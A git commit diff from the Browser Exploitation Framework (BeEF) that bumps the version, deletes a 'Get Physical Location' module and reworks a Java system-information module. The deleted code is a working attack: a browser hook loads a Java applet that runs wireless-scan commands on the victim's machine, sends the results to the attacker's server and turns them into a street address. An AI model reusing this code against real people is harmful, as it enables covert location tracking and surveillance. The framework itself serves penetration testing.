Bump version to 0.4.7.3-alpha

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.7.2-alpha
+0.4.7.3-alpha

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.7.2-alpha'
+    version: '0.4.7.3-alpha'
     # More verbose messages (server-side)
     debug: false
     # More verbose messages (client-side)

modules/host/get_physical_location/command.js

@@ -1,21 +0,0 @@
-/*
- * Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
- * Browser Exploitation Framework (BeEF) - http://beefproject.com
- * See the file 'doc/COPYING' for copying permission
- */
-
-beef.execute(function() {
-    var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
-    var applet_id = '<%= @applet_id %>';
-    var applet_name = '<%= @applet_name %>';
-    var output;
-    beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'getGPSLocation' ,
-       	null, applet_archive, null);
-    output = document.Microsoft_Corporation.getInfo();
-    if (output) {
-	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output);
-    }
-    beef.dom.detachApplet('getGPSLocation');
-});
-
-

modules/host/get_physical_location/config.yaml

@@ -1,17 +0,0 @@
-#
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-
-beef:
-    module:
-        get_physical_location:
-            enable: true
-            category: "Host"
-            name: "Get Physical Location"
-            description: "This module will retrieve geolocation information based on the neighboring wireless access points using commands encapsulated within a signed Java Applet. <br/><br/>The details will include:<br/> <ul><li> - GPS Coordinates details</li><li> - Street Address details</li></ul><br/><br/> If the victim machine has a firewall that monitors outgoing connections (Zonealaram, LittleSnitch, ..), calls to Google maps will be alerted."
-            authors: ["keith_lee @keith55 http://milo2012.wordpress.com", "antisnatchor"]
-            target:
-                working: ["IE"]
-                user_notify: ["C", "S", "O", "FF"]

modules/host/get_physical_location/getGPSLocation.java

@@ -1,184 +0,0 @@
-/*
- * Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
- * Browser Exploitation Framework (BeEF) - http://beefproject.com
- * See the file 'doc/COPYING' for copying permission
- */
-
-import java.io.*;  
-import java.util.*;
-import java.net.*;
-import java.applet.*;
-import java.util.regex.Matcher;
-import java.util.regex.Pattern;
-
-// Keith Lee
-// Twitter: @keith55
-// http://milo2012.wordpress.com
-// keith.lee2012[at]gmail.com
-
-public class getGPSLocation extends Applet{  
-	public static String result = "";
-	
-	public getGPSLocation(){
-		super();
-		return;
-	}
-	public static String getInfo() {
-		return result;
-	}
-
-	public void init() {
-		if (isWindows()) {
-			result=getWindows();
-		} else if (isMac()) {
-			result=getMac();
-		} else {
-			//System.out.println("Your OS is not support!!");
-		}
-	}
-	
-	public static String getWindows(){
-            try {  
-			
-		ArrayList ssidList = new ArrayList();
-		ArrayList bssidList = new ArrayList();
-		ArrayList rssiList = new ArrayList();
-			
-		Process p = Runtime.getRuntime().exec("netsh wlan show networks mode=bssid");  
-                
-		BufferedReader in = new BufferedReader(  
-                                    new InputStreamReader(p.getInputStream()));  
-                String line = null;  
-		String signal = null;
-		String ssidStr = null;
-		
-		while ((line = in.readLine()) != null) {  
-			
-			Pattern p1 = Pattern.compile("(SSID\\s\\d+\\s:)\\s([\\w\\s]*)");
-			Matcher m1 = p1.matcher(line);
-			if(m1.find()){
-				ssidStr = m1.group(2);
-				ssidStr = ssidStr.replaceAll(" ","%20");
-				ssidList.add(ssidStr);
-			}	
-			Pattern p2 = Pattern.compile("(BSSID\\s1\\s*:)\\s((.?)*)");
-			Matcher m2 = p2.matcher(line);
-			if(m2.find()){
-				bssidList.add(m2.group(2));
-			}	
-			Pattern p3 = Pattern.compile("(Signal\\s*):\\s((.?)*)");
-			Matcher m3 = p3.matcher(line);
-			if(m3.find()){
-				signal = m3.group(2);
-				signal = signal.replaceAll("%","");
-				signal = signal.replaceAll(" ","");
-				signal = "-"+signal;
-				rssiList.add(signal);
-			}											
-		}
-
-		int arraySize=ssidList.size();
-		if(arraySize==0){
-			result="\nI don't know where the target is";
-		}
-		else{
-			result=googleLookup(bssidList,ssidList,rssiList);
-		}
-	         } catch (Exception e) {  
-	        	System.out.println(e.getMessage());
-            }
-			return result;          
-	}
-	
-	public static String googleLookup(ArrayList bssidList,ArrayList ssidList,ArrayList rssiList){
-	    String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
-	    try {  
-			int j=0;
-			while(j<ssidList.size()){
-				queryString+="&wifi=mac:";
-				queryString+=bssidList.get(j);
-				queryString+="%7C";
-				
-				queryString+="ssid:";
-				queryString+=ssidList.get(j);
-			
-				queryString+="%7C";
-				queryString+="ss:";
-				queryString+=rssiList.get(j);
-				j++;
-			}		
-		} catch (Exception e) { 
-			System.out.println(e.getMessage());
-		}
-		return queryString;		
-	}
-	
-	public static String getMac(){
-        try {  
-                Process p = Runtime.getRuntime().exec("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport scan");  
-                BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));  
-                String line = null;  
-				String ssidStr = null;
-				String signal = null;
-				
-				String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
-		
-				ArrayList ssidList = new ArrayList();
-				ArrayList bssidList = new ArrayList();
-				ArrayList rssiList = new ArrayList();
-
-				line = in.readLine();	
-				while ((line = in.readLine()) != null) {  
-					line = line.replaceAll("^\\s+", "");
-					
-					Pattern p1 = Pattern.compile("((.?)*\\s\\w*):(\\w*:\\w*:\\w*:\\w*:\\w*)\\s((.?)*)\\s(\\d+)");
-					Matcher m1 = p1.matcher(line);
-					if(m1.find()){
-						ssidStr = m1.group(1);
-						ssidStr = ssidStr.replaceAll(" ","%20");
-						ssidList.add(ssidStr);
-						bssidList.add(m1.group(2));
-						signal = m1.group(3);
-						signal = signal.replaceAll(" ","");
-						rssiList.add(signal);
-					}
-					
-				}
-			int arraySize=ssidList.size();
-			if(arraySize==0){
-				result="\nI don't know where the target is";
-			}
-			else{
-				result=googleLookup(bssidList,ssidList,rssiList);
-			}
-		} catch (Exception e) { 
-			System.out.println(e.getMessage());
-		}  
-		return result;		
-	}  
-
-	public static boolean isWindows() {
- 
-		String os = System.getProperty("os.name").toLowerCase();
-		// windows
-		return (os.indexOf("win") >= 0);
- 
-	}
- 
-	public static boolean isMac() {
- 
-		String os = System.getProperty("os.name").toLowerCase();
-		// Mac
-		return (os.indexOf("mac") >= 0);
- 
-	}
- 
-	public static boolean isLinux() {
- 
-		String os = System.getProperty("os.name").toLowerCase();
-		// linux or unix
-		return (os.indexOf("nix") >= 0 || os.indexOf("nux") >= 0);
- 
-	}
-
-    }  

modules/host/get_physical_location/module.rb

@@ -1,40 +0,0 @@
-#
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-
-require 'rubygems'
-require 'json'
-require 'open-uri'
-
-class Get_physical_location < BeEF::Core::Command
-
-  def pre_send
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_physical_location/getGPSLocation.jar', '/getGPSLocation', 'jar')
-  end
-
-  def post_execute        
-    results = @datastore['results'].to_s
-    results = results.gsub("location_info=","")
-
-    response = open(results).read
-    result = JSON.parse(response)
-    reverseGoogleUrl = "https://maps.googleapis.com/maps/geo?q="+result['location']['lat'].to_s+','+result['location']['lng'].to_s+"&output=json&sensor=true_or_false"
-    googleResults = open(reverseGoogleUrl).read
-    jsonGoogleResults = JSON.parse(googleResults)
-
-    addressFound = jsonGoogleResults['Placemark'][0]['address']
-
-    writeToResults = Hash.new
-    writeToResults['data'] = addressFound
-    BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults, 0)
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/getGPSLocation.jar')
-
-    content = {}
-    content['Result'] = addressFound
-    save content
-  end
-
-end
-

modules/host/get_system_info_java/command.js

@@ -6,39 +6,36 @@
 
 beef.execute(function() {
 
-	var internal_counter = 0;
-	var timeout = 30;
-	var output;
+  var internal_counter = 0;
+  var timeout = 30;
+  var output;
 
-	beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null);
+  beef.debug('[Get System Info (Java)] Loading getSystemInfo applet...');
+  beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null);
 
-	if (beef.browser.isFF()) {
+  function waituntilok() {
+    beef.debug('[Get System Info (Java)] Executing getSystemInfo applet...');
 
-		output = document.getSystemInfo.getInfo();
-		if (output) beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info='+output.replace(/\n/g,"<br>"));
-		beef.dom.detachApplet('getSystemInfo');
+    try {
+      output = document.getSystemInfo.getInfo();
+      if (output) {
+        beef.debug('[Get System Info (Java)] Retrieved system info: ' + output);
+         beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info='+output.replace(/\n/g,"<br>"), beef.are.status_success());
+        beef.dom.detachApplet('getSystemInfo');
+        return;
+      }
+    } catch (e) {
+      internal_counter = internal_counter + 5;
+      if (internal_counter > timeout) {
+        beef.debug('[Get System Info (Java)] Timeout after ' + timeout + ' seconds');
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info=Timeout after ' + timeout + ' seconds', beef.are.status_error());
+        beef.dom.detachApplet('getSystemInfo');
+        return;
+      }
+      setTimeout(function() {waituntilok()}, 5000);
+    }
+  }
 
-	} else {
-
-		function waituntilok() {
-			try {
-				output = document.getSystemInfo.getInfo();
-				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info='+output.replace(/\n/g,"<br>"));
-				beef.dom.detachApplet('getSystemInfo');
-				return;
-			} catch (e) {
-				internal_counter++;
-				if (internal_counter > timeout) {
-					beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info=Timeout after '+timeout+' seconds');
-					beef.dom.detachApplet('getSystemInfo');
-					return;
-				}
-				setTimeout(function() {waituntilok()},1000);
-			}
-		}
-
-		setTimeout(function() {waituntilok()},5000);
-
-	}
+  setTimeout(function() {waituntilok()}, 5000);
 });
 

modules/host/get_system_info_java/config.yaml

@@ -15,5 +15,4 @@ beef:
                 not_working:
                     ALL:
                         os: ["iOS", "Macintosh"]
-                working: ["O", "FF", "S", "IE"]
-                user_notify: ["C"]
+                user_notify: ["C", "O", "FF", "S", "IE"]

modules/host/get_system_info_java/module.rb

@@ -6,7 +6,7 @@
 class Get_system_info_java < BeEF::Core::Command
   
 	def pre_send
-		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_system_info/getSystemInfo.class','/getSystemInfo','class')
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_system_info_java/getSystemInfo.class','/getSystemInfo','class')
 	end
   
 	def post_execute